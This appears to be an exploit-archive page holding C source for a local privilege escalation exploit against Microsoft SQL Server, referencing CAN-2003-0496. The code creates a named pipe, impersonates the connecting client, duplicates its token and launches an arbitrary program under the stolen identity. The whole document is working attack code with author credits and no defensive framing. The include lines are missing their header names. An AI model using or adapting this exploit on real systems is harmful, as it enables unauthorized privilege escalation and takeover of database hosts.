Microsoft SQL Server Named Pipe Privilege Escalation Exploit
|
* Version TXT Disponible ici *
/*
* Author: Maceo and wirepair
* Modified to take advantage of CAN-2003-0496 Named Pipe Filename
* MSSQL Local Privilege Escalation Found by @stake. Use with their advisory
*/
#include
#include
int main(int argc, char **argv)
{
char szPipe[64];
DWORD dwNumber = 0;
DWORD dwType = REG_DWORD;
DWORD dwSize = sizeof(DWORD);
DWORD dw = GetLastError();
HANDLE hToken, hToken2;
PGENERIC_MAPPING pGeneric;
SECURITY_ATTRIBUTES sa;
DWORD dwAccessDesired;
PACL pACL = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
if (argc != 2) {
fprintf(stderr, "Usage: %s \nNamed Pipe Local
Priv Escalation found by @stake.\n"
"This code is to be used with MS-SQL exactly as
outlined in their advisory\n"
"All credit for this code goes to Maceo, he did a
fine job.. -wire\n"
"Also thanks goes to brett Moore for helping me
with DuplicateTokenEx, thanks buddy guy!\n",argv[0]);
exit(1);
}
memset(&si,0,sizeof(si));
sprintf(szPipe, "\\\\.\\pipe\\poop");
// create the named pipe
HANDLE hPipe = 0;
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE) {
printf ("Failed to create named pipe:\n %s\n",
szPipe);
return 3;
}
printf("Created Named Pipe: \\\\.\\pipe\\poop\n");
// setup security attribs
pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,
SECURITY_DESCRIPTOR_MIN_LENGTH);
InitializeSecurityDescriptor(pSD,
SECURITY_DESCRIPTOR_REVISION);
SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE);
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = pSD;
sa.bInheritHandle = FALSE;
printf("Waiting for connection...\n");
// wait for client to connect
ConnectNamedPipe (hPipe, NULL);
// assume the identity of the client //
if (!ImpersonateNamedPipeClient (hPipe)) {
printf ("Failed to impersonate the named pipe.\n");
CloseHandle(hPipe);
return 5;
}
if (!OpenThreadToken(GetCurrentThread(),
TOKEN_ALL_ACCESS, TRUE, &hToken )) {
if (hToken != INVALID_HANDLE_VALUE) {
printf("GetLastError: %u\n", dw);
CloseHandle(hToken);
exit(0);
}
}
printf("Duplicating Token...\n");
if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,&sa,SecurityImpersonation,
TokenPrimary,&hToken2) == 0) {
printf("error in duplicate token\n");
printf("GetLastError: %u\n", dw);
exit(0);
}
MapGenericMask( &dwAccessDesired, pGeneric );
// display impersonating users name
dwSize = 256;
char szUser[256];
GetUserName(szUser, &dwSize);
printf ("Impersonating: %s\n", szUser);
si.cb = sizeof(si);
si.lpDesktop = NULL;
printf("Creating New Process %s\n", argv[1]);
if(!CreateProcessAsUser(hToken2, NULL, argv[1], &sa,
&sa,true, NORMAL_PRIORITY_CLASS |
CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) {
printf("GetLastError: %u\n", dw);
}
CloseHandle(hPipe);
return 0;
}
|